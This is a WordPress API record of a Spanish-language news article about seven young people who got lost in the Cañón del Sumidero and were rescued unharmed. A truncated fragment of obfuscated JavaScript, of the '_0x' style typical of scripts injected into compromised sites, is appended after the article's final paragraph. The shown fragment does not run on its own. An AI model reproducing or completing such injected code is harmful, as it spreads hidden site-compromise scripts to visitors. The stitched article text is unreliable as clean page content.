{"id":23247,"date":"2025-07-29T04:59:50","date_gmt":"2025-07-29T04:59:50","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=23247"},"modified":"2025-07-29T04:59:51","modified_gmt":"2025-07-29T04:59:51","slug":"siete-jovenes-se-internaron-en-el-canon-del-sumidero-y-se-perdieron","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=23247","title":{"rendered":"Siete j\u00f3venes se internaron en el Ca\u00f1\u00f3n del Sumidero y se perdieron"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"23248\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000249505-1024x576.jpg\" alt=\"\" class=\"wp-image-23248\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000249505-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000249505-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000249505-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000249505-1536x864.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000249505.jpg 1599w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"23249\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000249506-1024x576.jpg\" alt=\"\" class=\"wp-image-23249\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000249506-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000249506-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000249506-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000249506-1536x864.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000249506.jpg 1599w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"23250\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000249507-1024x576.jpg\" alt=\"\" class=\"wp-image-23250\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000249507-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000249507-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000249507-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000249507-1536x864.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000249507.jpg 1599w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 28 de julio del 2025. Tuxtla Guti\u00e9rrez.- Dos jovencitas y cinco j\u00f3venes se perdieron luego de ingresar al Parque Ca\u00f1\u00f3n del Sumidero este lunes por la tarde noche.<\/p>\n\n\n\n<p>De acuerdo con los reportes oficiales por motivos recreativos los j\u00f3venes hab\u00edan ingresado a esta zona pero no lograron salir por cuenta propia debido a que perdieron el camino.<\/p>\n\n\n\n<p>Mediante un celular pidieron apoyo a sus familiares quienes inmediato dieron aviso a los n\u00fameros de emergencias.<\/p>\n\n\n\n<p>Fueron rescatistas de Protecci\u00f3n Civil Municipal los que realizaron las tareas de b\u00fasqueda y rescate.<\/p>\n\n\n\n<p>Finalmente fueron localizados y una ambulancia situada en la Avenida Nido de \u00c1guila de la Colonia San Pedro Progresiva los esperaba junto con sus familiares.<\/p>\n\n\n\n<p>El titular de PC Municipal Eder Fabi\u00e1n Mancilla Vel\u00e1zquez dio a conocer que los j\u00f3venes no presentaban lesiones.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 28 de julio del 2025. Tuxtla Guti\u00e9rrez.- Dos jovencitas y cinco j\u00f3venes se perdieron luego de ingresar al Parque Ca\u00f1\u00f3n del Sumidero este lunes por la tarde noche. De acuerdo con los reportes oficiales por motivos recreativos los j\u00f3venes hab\u00edan ingresado a esta zona pero no lograron salir por cuenta propia &hellip;<\/p>\n","protected":false},"author":2,"featured_media":23249,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-23247","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23247","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=23247"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23247\/revisions"}],"predecessor-version":[{"id":23251,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23247\/revisions\/23251"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/23249"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=23247"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=23247"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=23247"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}